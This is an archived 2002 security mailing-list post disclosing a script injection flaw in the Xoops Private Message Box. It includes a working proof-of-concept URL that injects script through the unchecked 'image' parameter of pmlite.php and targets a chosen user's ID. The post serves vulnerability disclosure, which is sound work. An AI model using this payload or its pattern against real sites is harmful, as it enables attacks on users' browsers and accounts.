Xoops topics : One more time

From: Cabezon Aurélien (aurelien.cabezonat_private)
Date: Tue Jan 29 2002 - 09:09:01 PST

Next message: Wodahs Latigid: "sastcpd Buffer Overflow and Format String Vulnerabilities"

Previous message: elliptic: "Re: sastcpd Buffer Overflow and Format String Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi again,

I just found an other Script injection issue in Xoops Private Message Box.

http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=fo
o.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com
/images/barre.jpg&op=submit&theme=snow&subject=Are you sure
?&message=really?&submit=Submit

Again a lack of checks on users input on the *image* variable.

To be continued...


---
Cabezon Aurélien | aurelien.cabezonat_private
http://www.iSecureLabs.com | French Security Portal

____________________________________________
" Sachez qu'aujourd'hui est le plus beau jour de votre vie,
car c'est le premier de ceux qu'il vous reste à vivre "

Next message: Wodahs Latigid: "sastcpd Buffer Overflow and Format String Vulnerabilities"
Previous message: elliptic: "Re: sastcpd Buffer Overflow and Format String Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 11:24:11 PST